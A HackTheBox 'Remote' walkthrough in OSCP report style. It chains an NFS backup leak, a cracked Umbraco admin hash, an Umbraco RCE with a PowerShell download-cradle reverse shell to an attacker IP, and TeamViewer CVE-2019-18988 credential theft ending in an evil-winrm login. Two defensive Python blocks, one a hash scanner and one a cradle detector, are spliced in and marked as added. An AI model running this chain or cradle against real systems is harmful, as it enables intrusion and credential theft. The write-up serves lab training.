Remote — HackTheBox Writeup OSCP Style

Remote was an easy-difficulty Windows machine that featured an Umbraco RCE and TeamViewer's famous CVE-2019-18988. I had been thinking of publishing an article in OSCP style; it took a while.

Offsec’s PWK Example Report: https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf

I used the above example report for my OSCP exam report and this walkthrough will follow the same template as well.

Report-Penetration

The penetration testing portion of the assessment focuses heavily on gaining access to the Remote machine. During this penetration test, Preetham was able to successfully gain access to the Remote machine.

Vulnerability Exploited: Umbraco CMS — Remote Code Execution by authenticated administrators

System Vulnerable: 10.10.10.180

Vulnerability Explanation: Umbraco CMS suffers from an authenticated remote code execution vulnerability in the xsltVisualise functionality. The credentials for the Umbraco CMS were found by mounting an NFS share that contained Umbraco.sdf, a SQL Server Compact Edition file.

References: https://www.exploit-db.com/exploits/46153

https://github.com/noraj/Umbraco-RCE

Privilege Escalation Vulnerability: TeamViewer CVE-2019-18988 (gather credentials from the registry).

Reference: https://whynotsecurity.com/blog/teamviewer/

Vulnerability Fix: Update TeamViewer to the latest version

Severity: Critical

Information Gathering

Full Nmap Scan

Nmap scan report for 10.10.10.180
Host is up (0.74s latency).
PORT     STATE SERVICE       VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP with anonymous access, a web server, RPC, SMB and NFS ports are open. Preetham listed the NFS exports with showmount and mounted the site_backups share.

Umbraco.sdf file

root@kali:~/htb/boxes/remote# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change

Preetham obtained the admin account's hash (b8be16afba8c314ad33d812f22a04991b90e2aaa), of SHA1 type.
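A pre-export check for the exposure described above, as an added example that is not part of the original writeup: it scans a backup file for password digests tagged with a hashAlgorithm field, the pattern visible in the strings output, and reports them redacted. The function name, the sample bytes and the placeholder digest are constructed for illustration.

```python
import re

# Printable-ASCII runs of 6+ bytes: the same view `strings` gives of a binary file.
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")
# Hex digest of MD5/SHA-1/SHA-256 length directly followed by the algorithm tag
# seen in the strings output above.
RECORD = re.compile(
    r'([0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\{"hashAlgorithm":"([^"]+)"\}',
    re.IGNORECASE,
)
# Fast general-purpose digests: no work factor, so unsuitable for password storage.
FAST_DIGESTS = {"MD5", "SHA1", "SHA256"}


def scan_backup(blob):
    """Return one finding per distinct credential digest found in `blob` (bytes)."""
    found = {}
    for run in PRINTABLE.finditer(blob):
        text = run.group().decode("ascii")
        for rec in RECORD.finditer(text):
            digest, algo = rec.group(1).lower(), rec.group(2).upper()
            entry = found.setdefault(digest, {
                "digest": digest[:6] + "...",  # redacted: never log the full hash
                "algorithm": algo,
                "fast_digest": algo in FAST_DIGESTS,
                "offsets": [],
            })
            # Byte offset of the digest inside the file, for locating the record.
            entry["offsets"].append(run.start() + rec.start(1))
    return list(found.values())


# Constructed sample modelled on the records above; the digest is a placeholder.
DIGEST = b"0123456789abcdef0123456789abcdef01234567"
SAMPLE = (
    b"\x00\x01Administratoradmin" + DIGEST + b'{"hashAlgorithm":"SHA1"}en-US\x00\xff'
    b"adminadmin@example.test" + DIGEST + b'{"hashAlgorithm":"SHA1"}\x00'
    b"no secrets in this run\x00"
)

if __name__ == "__main__":
    for finding in scan_backup(SAMPLE):
        print(finding)
```

A non-empty result means the backup carries credential material and should not sit on a share that any client can mount.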

Cracking Hash

Preetham obtained the password as baconandcheese

Remote Code Execution

Reference: https://github.com/noraj/Umbraco-RCE

Reverse Shell

Preetham used https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 to obtain a reverse shell.

Command

python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.42/shell.ps1')"
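Detection logic for this step, as an added example that is not part of the original writeup: it scores process-creation events and flags a shell started by the web server's worker process whose command line contains a download-and-execute pattern like the one above. The events are constructed, use Sysmon's Image, ParentImage and CommandLine field names, and assume Umbraco runs under the IIS worker w3wp.exe.

```python
import re
from pathlib import PureWindowsPath

# Assumption: the Umbraco site is hosted by the IIS worker process w3wp.exe.
WEB_PARENTS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download-and-execute markers in either order, matched case-insensitively.
CRADLE = re.compile(
    r"(\biex\b|invoke-expression).*(downloadstring|net\.webclient)"
    r"|(downloadstring|net\.webclient).*(\biex\b|invoke-expression)",
    re.IGNORECASE | re.DOTALL,
)
URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def triage(event):
    """Score one process-creation event; returns (severity, reasons, urls)."""
    child = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in WEB_PARENTS and child in SHELLS:
        reasons.append("shell spawned by web worker")
    if CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    severity = ("none", "medium", "high")[len(reasons)]
    return severity, reasons, URL.findall(cmd)


# Constructed events; the first mirrors the command shown above.
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"Image": PS, "ParentImage": W3WP,
     "CommandLine": "powershell.exe IEX(New-Object System.Net.WebClient)"
                    ".DownloadString('http://10.10.14.42/shell.ps1')"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": W3WP,
     "CommandLine": "cmd.exe /c ipconfig"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile Get-ChildItem C:\\inetpub"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev))
```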

User.txt and IP address

Privilege Escalation: TeamViewer CVE-2019-18988 (gather credentials from the registry)

Reference: https://whynotsecurity.com/blog/teamviewer/

On enumeration, Preetham found TeamViewer installed on the machine.

Preetham found that the version of TeamViewer is 7 by doing the below.

Preetham obtained a meterpreter shell by executing a malicious binary created by msfvenom on the machine.

Preetham ran the TeamViewer MSF module, found the Administrator's password and logged in using WinRM.

Command: evil-winrm -i 10.10.10.180 -u administrator -p '!R3m0te!'

Root.txt and ipconfig


Remote — HackTheBox Writeup OSCP Style was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
